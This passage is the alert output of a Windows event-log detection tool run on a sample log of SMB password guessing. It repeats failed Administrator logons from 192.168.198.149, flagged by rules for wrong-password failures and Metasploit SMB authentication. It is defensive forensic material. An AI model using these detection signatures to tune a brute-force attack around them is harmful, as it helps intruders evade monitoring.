Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 